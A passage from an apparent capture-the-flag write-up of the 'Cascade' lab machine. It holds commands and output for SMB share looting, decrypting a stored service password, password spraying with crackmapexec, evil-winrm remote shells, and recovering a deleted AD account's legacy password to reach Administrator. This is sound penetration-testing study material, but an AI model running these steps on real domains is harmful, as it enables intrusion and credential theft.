[+] IP: 10.10.10.182:445 Name: cascade.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
.\Audit$\*
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 .
dr--r--r-- 0 Wed Jan 29 13:01:26 2020 ..
fr--r--r-- 13312 Tue Jan 28 16:47:08 2020 CascAudit.exe
fr--r--r-- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dll
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 DB
fr--r--r-- 45 Tue Jan 28 18:29:47 2020 RunAudit.bat
fr--r--r-- 363520 Tue Jan 28 15:42:18 2020 System.Data.SQLite.dll
fr--r--r-- 186880 Tue Jan 28 15:42:18 2020 System.Data.SQLite.EF6.dll
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x64
dr--r--r-- 0 Tue Jan 28 15:42:18 2020 x86
.\Audit$\DB\*
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 .
dr--r--r-- 0 Tue Jan 28 16:43:18 2020 ..
fr--r--r-- 24576 Tue Jan 28 16:43:18 2020 Audit.db
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1623036 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1623036 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (60.5 KiloBytes/sec) (average 60.5 KiloBytes/sec)
smb: \DB\> exit
┌──(rocky㉿kali)-[~/hckbox/cascade]
└─$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002
I did not get any useful info from Audit.db.
└─$ sqlite3 Audit.db
SQLite version 3.34.1 2021-01-20 14:10:07
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc;
sqlite>
Let's download all the files for further checks.
smb: \DB\> cd ..
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1623036 blocks available
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (39.3 KiloBytes/sec) (average 39.3 KiloBytes/sec)
smb: \> get CascCrypto.dll
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (45.3 KiloBytes/sec) (average 41.9 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.2 KiloBytes/sec) (average 29.2 KiloBytes/sec)
smb: \> get System.Data.SQLite.dll
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (733.5 KiloBytes/sec) (average 283.2 KiloBytes/sec)
smb: \> get System.Data.SQLite.EF6.dll
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (640.4 KiloBytes/sec) (average 345.8 KiloBytes/sec)
smb: \> exit

Now let's try to decrypt the ArkSvc value from the Ldap table. It is base64-encoded AES-128-CBC ciphertext:
─$ echo -n BQO5l5Kj9MdErXx6Q6AGOw== | base64 -d | openssl enc -aes-128-cbc -d -nosalt -nopad -K $(echo -n c4scadek3y654321 | iconv -t UTF-8 | xxd -p) -iv $(echo -n 1tdyjCbY1Ix49842 | iconv -t UTF-8 | xxd -p); echo
w3lc0meFr31nd
crackmapexec winrm 10.10.10.182 -u users.txt -p w3lc0meFr31nd --continue-on-success
WINRM 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\CascGuest:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\arksvc:w3lc0meFr31nd (Pwn3d!)
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\s.smith:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\util:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.wakefield:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\s.hickson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.goodhand:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\a.turnbull:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\e.crowe:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\b.hanson:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\d.burman:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\BackupSvc:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\j.allen:w3lc0meFr31nd
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\i.croft:w3lc0meFr31nd
Working credentials: arksvc:w3lc0meFr31nd
evil-winrm -i 10.10.10.182 -P 5985 -u arksvc -p 'w3lc0meFr31nd'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 4:18:20 PM
Password expires Never
Password changeable 1/9/2020 4:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 9:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Active Directory has a feature called the AD Recycle Bin, which allows deleted objects to be recovered.
The command for this is shown below. The results are uploaded [here](Rchitect/deletedAD at Yoda · tcprks/Rchitect · GitHub).
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Part of the result looks interesting:
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
As in the previous example, search for "cascadeLegacyPwd"; this time the value is "YmFDVDNyMWFOMDBkbGVz".
Let's decode it and log in as Administrator with the decoded password.
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
┌──(rocky㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.182 -P 5985 -u administrator -p 'baCT3r1aN00dles'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/18/2022 3:32 PM 34 root.txt
The key takeaways for the exam
During the initial enumeration we obtained the DC hostname and a list of usernames. However, we were unable to find any Kerberos hashes that would help us log in. We then used ldapsearch in detail to retrieve more attributes:
**ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-entry**
**ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-person**
The first user, "s.smith", seems to be an audit user without much privilege. So once we get an initial shell, use the commands below to understand the user's privileges. This way we can see that we need to escalate to one more user before getting Administrator access. The command below clearly shows that he is a member of the Audit Share group.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user s.smith
Local Group Memberships *Audit Share *IT
*Remote Management Use
Global Group memberships *Domain Users
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup "Audit Share"
Alias name Audit Share
Comment \\Casc-DC1\Audit$
Members
-------------------------------------------------------------------------------
s.smith
The command completed successfully.
The AD Recycle Bin is another interesting takeaway. It helps to recover deleted items. In this case, from the notes found on the SMB share, we saw that "TempAdmin" had been deleted, and even the original "Administrator" uses the same password as the deleted "TempAdmin".
smbclient --user r.thompson //10.10.10.182/data rY4n5eva
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (12.0 KiloBytes/sec) (average 12.0 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (6.2 KiloBytes/sec) (average 9.1 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (24.7 KiloBytes/sec) (average 14.8 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (12.8 KiloBytes/sec) (average 14.3 KiloBytes/sec)
smb: \> exit

Remember the commands that help recover items from the AD Recycle Bin. Look for "cascadeLegacyPwd" in the command output and decode it with base64: echo "xxxxxxx" | base64 -d
**Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects**
**Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property ***
Here TempAdmin is the username found with the first command.